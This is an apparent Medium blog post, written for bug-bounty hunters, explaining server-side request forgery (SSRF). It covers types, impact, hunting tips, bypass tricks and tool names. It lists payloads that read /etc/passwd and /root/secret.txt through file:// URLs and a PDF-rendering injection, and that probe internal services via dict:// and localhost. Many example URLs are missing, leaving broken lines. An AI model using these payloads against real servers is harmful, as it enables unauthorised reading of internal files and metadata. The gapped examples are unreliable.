Server-Side Request Forgery, SSRF

erver-Side Request Forgery, SSRF for short, is a vulnerability class that describes the behaviour of a server making a request that’s under the attacker’s control. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organisations infrastructure, or to external third-party systems.

What are types of SSRF.

· Blind SSRF — occurs when you never get any information about a target service from the initial request

· Semi Blind SSRF

· Non-Blind SSRF

What is the impact of SSRF attacks?

A successful SSRF attack can often result in

· Unauthorised actions or access to data within the organisation, either in the vulnerable application itself or on other back-end systems that the application can communicate with.

· Scan Local or External Networks.

· Read Files from the Server & Internal Resources

· SSRF to Reflected XSS

· Can fetch the metadata of the servers.

Preventing Server Side Request Forgery (SSRF)

To prevent SSRF vulnerabilities in web applications it is strongly advised to use a white-listings of allowed domains and protocols from where the web server can fetch remote resources.

When you have to try for SSRF?

1. If you got Open Redirect try escalating it to SSRF.

2. SSRF to grep parameters may vulnerable to SSRF.

3. SSRF’s are more in API’s so crawl the whole web app with burp proxy turned on and search for keywords like., eg : ?url= , ?uri= , ?req=

4. Sign up with an Email like If u receive HTTP req. in collaborator then its SSRF. But if there’s no impact don’t report it, DNS and SMTP request doesn’t matters.

5. Try to find Blind SSRF on hidden parameter

6. Try Blind SSRF on referer header

How we can Perform a SSRF attack to a target application?

Some of the payloads for SSRF

URL based bypasses:\\@

Bypassing using a redirect

1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g.

2. Launch the SSRF pointing to will fetch YOUR_SERVER_IP which will redirect to

Bypassing using type=url

Change “type=file” to “type=url”

Paste URL in text field and hit enter

Using this vulnerability users can upload images from any image URL = trigger an SSRF

SSRF exploiting PDF file

<link rel=attachment href=”file:///root/secret.txt”>


The content of the file will be integrated inside the PDF as an image or text.

<img src=”echopwn” onerror=”document.write(‘<iframe src=file:///etc/passwd></iframe>’)”/>



It will give something like

RESPONSE: <html><head><title>Internal admin panel</title></head>…</html>

SSRF from Referrer



User Agent: Firefox


SSRF from File-upload — redirect test for various cases

Status codes: 300, 301, 302, 303, 305, 307, 308

Filetypes: jpg, json, csv, xml, pdf

JPG 301 response without and with a valid response body:

JSON 301 response without and with a valid response body:

CSV 301 response without and with a valid response body:

XML 301 response without and with a valid response body:

pdf 301 response without and with a valid response body:


1. AWS localhost is so don’t use there!

2. If you find any SSRF vulnerability that runs on EC2, try requesting :

SSRF URL for Oracle Cloud

SSRF URL for Alibaba

Few more Random Payloads that might be helpful in finding SSRF vulnerability.

Use the below payloads in the body of the request

GET /?url= HTTP/1.1

GET /?url=http://localhost/server-status HTTP/1.1

GET /?url= HTTP/1.1

GET /?url=dict://localhost:11211/stat

GET /?url=file:///etc/passwd

file:///, dict://, ftp:// gopher:// keywords

{“userId”: “1”, “url”: “http://127.0.1:513/"}

{“userId”: “1”, “url”: “"}

Some of the tools that can be used for SSRF

· SSRFmap —

· Gopherus —

· See-SURF —

· SSRF Sheriff —




A white hat Hacker...!!!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Hyperledger Aries ACA-Py Agents Setup and Running Tutorials— Part I — Hyperledger Indy Project…

{UPDATE} Babys Phone Birds Kids Game Pro Hack Free Resources Generator


Hashgard Community Node Operator List is Officially Released!!(5th Round)

Young Generation Demands Accountability from Leaders

CMC Airdrop — DUET claim guide

Solidbit Registration: A Step-by-Step Guide

[Notice] DUCATO Announcement : Participation in ‘2021 Busan Money Show’ to promote ‘Round Robin’…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akash Venky

Akash Venky

A white hat Hacker...!!!

More from Medium

How I Made $16,500+ By Hacking Caching Servers — Part 1

Web-Hacking-Toolkit — A Multi-Platform Web Hacking Toolkit Docker Image With Graphical User…

A Peculiar Case of XSS and my first bug

ZyXEL privilege escalation through micro_httpd web server